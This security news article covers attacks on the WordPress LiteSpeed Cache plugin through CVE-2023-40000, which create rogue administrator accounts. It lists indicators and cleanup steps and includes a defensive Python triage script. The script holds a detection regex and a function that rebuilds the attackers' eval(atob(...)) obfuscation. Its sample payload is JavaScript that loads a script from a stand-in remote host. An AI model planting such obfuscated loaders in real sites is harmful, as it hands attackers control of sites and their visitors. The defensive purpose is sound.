WordPress is once again the target of attackers, who are exploiting a high-severity flaw in the LiteSpeed Cache plugin to create administrator accounts and, through them, take control of the site.
If WordPress is the most popular CMS, it is also the favorite hunting ground of attackers, who put its plugins to very different use than site builders do.
Indeed, after the flaw discovered in LayerSlider in April, preceded by LiteSpeed in March and the Bricks theme in February, May 2024 promises, unfortunately, to be another month rich in WordPress flaws. The latest, documented by researchers from the WPScan security team, concerns the LiteSpeed Cache plugin.
How hackers create administrators
“wpsupp-user” or “wp-configuser”
If a new administrator named “wpsupp-user” or “wp-configuser” has appeared on your WordPress site, that is a bad sign: these are the names the attackers give the administrators they create by injecting malicious JavaScript either into the site’s files or into its database. And if, in addition, the option “litespeed.admin_display.messages” contains the string “eval(atob(Strings.fromCharCode”, it is a double whammy: the database is also infected.
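The two indicators above can be checked offline in a few lines. The script below is an added example (not code from the article, WPScan or LiteSpeed): it takes the administrator list and the `litespeed.admin_display.messages` option value, which on a live site you would pull with `wp user list --role=administrator --fields=ID,user_login,user_registered --format=json` and `wp option get litespeed.admin_display.messages`, flags the rogue logins and the obfuscation marker, and peels the `eval(atob(String.fromCharCode(...)))` layers so the injected JavaScript can be read during triage. The sample data is constructed here for the self-contained run; the `Strings?` spelling in the regex is my assumption that a payload may use either the misspelling quoted by WPScan or the real JavaScript name.

```python
"""Triage helper for the LiteSpeed Cache admin-takeover indicators (added example)."""
import base64
import json
import re

# Rogue admin logins reported in the article.
ROGUE_ADMIN_LOGINS = {"wpsupp-user", "wp-configuser"}

# Obfuscation marker from the article. Accepts the quoted "Strings.fromCharCode"
# as well as the correct JavaScript "String.fromCharCode" (assumption, see lead-in).
MARKER_RE = re.compile(r"eval\(atob\(Strings?\.fromCharCode\(([\d,\s]+)\)\)\)")


def find_rogue_admins(admins):
    """Return administrator logins that match the known rogue names, sorted."""
    return sorted(a["user_login"] for a in admins if a["user_login"] in ROGUE_ADMIN_LOGINS)


def decode_payload(option_value):
    """Peel the three layers: the numbers are char codes of a base64 string,
    atob() base64-decodes it, eval() runs the result. Returns the inner
    JavaScript, or None when the marker is absent."""
    m = MARKER_RE.search(option_value)
    if not m:
        return None
    codes = [int(c) for c in m.group(1).replace(" ", "").split(",") if c]
    b64 = "".join(chr(c) for c in codes)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def triage(admins, option_value):
    """Combine both indicators into one verdict plus supporting detail."""
    findings = {
        "rogue_admins": find_rogue_admins(admins),
        "option_infected": MARKER_RE.search(option_value) is not None,
        "decoded_payload": decode_payload(option_value),
    }
    findings["compromised"] = bool(findings["rogue_admins"]) or findings["option_infected"]
    return findings


def build_obfuscated(js):
    """Rebuild the same obfuscation from plain JavaScript (used only to
    construct the sample option value below)."""
    b64 = base64.b64encode(js.encode()).decode()
    codes = ",".join(str(ord(ch)) for ch in b64)
    return f"eval(atob(String.fromCharCode({codes})))"


# Constructed sample data, not taken from a real site.
SAMPLE_ADMINS = json.loads("""[
 {"ID": 1,  "user_login": "siteowner",   "user_registered": "2021-03-02 10:00:00"},
 {"ID": 57, "user_login": "wpsupp-user", "user_registered": "2024-05-03 02:14:21"}
]""")
SAMPLE_INNER_JS = ("var s=document.createElement('script');"
                   "s.src='https://example.invalid/f.js';document.head.appendChild(s);")
SAMPLE_OPTION = build_obfuscated(SAMPLE_INNER_JS)

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_ADMINS, SAMPLE_OPTION), indent=2))
```

The same admin list can be obtained straight from the database with `SELECT u.ID, u.user_login, u.user_registered FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID WHERE m.meta_key = 'wp_capabilities' AND m.meta_value LIKE '%administrator%'` (adjust the `wp_` prefix to the site’s). Treat any administrator you do not recognise as suspect even if its name is not on the list above; the rogue names are a convenience for the attacker, not a guarantee.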
Behind this contamination is CVE-2023-40000, an unauthenticated stored cross-site scripting flaw with a CVSS score of 8.3 out of 10, which puts it in the “high” band (not “critical”, despite some reports). An attacker can store the payload without logging in; it then runs in the browser of an administrator who opens the affected dashboard page, and that administrator’s session is what creates the fake admin account.
Although the flaw is only exploitable in plugin versions prior to 5.7.0.1, WPScan reports that around 1,835,000 sites are still running a vulnerable version and are therefore potentially exposed.
The administrator account, the holy grail of WordPress site hackers
If attackers are so keen to create administrator accounts, it is not just for glory. On every website, whatever its CMS or host, the administrator holds the keys: the account gives its owner control over all of the site’s data, from the CMS itself to content management and plugins, including more sensitive data such as email addresses and credentials. Attackers put those permissions to their own use: distributing malware at will, redirecting visitors to fraudulent sites, hiding malware in the database or in code, stealing sensitive data and, of course, launching phishing campaigns.
It is therefore no surprise that the Wallarm team recently reported attacks on another critical flaw, CVE-2024-2876 (an SQL injection rated 9.8 out of 10) in another WordPress plugin, “Email Subscribers”, in versions prior to 5.7.14. Here too, the goal was to create administrator accounts.
Both companies recommend a major spring cleaning of affected sites: update the plugin to a version that is no longer vulnerable (5.7.0.1 or later for LiteSpeed Cache), restore the database and files from a backup free of any trace of the attack, delete the rogue admin accounts, reset the credentials of every account, and of course keep a close watch for any new suspicious administrator account. A huge task entrusted to… an administrator.
Source: Bleeping Computer, WPScan, Wallarm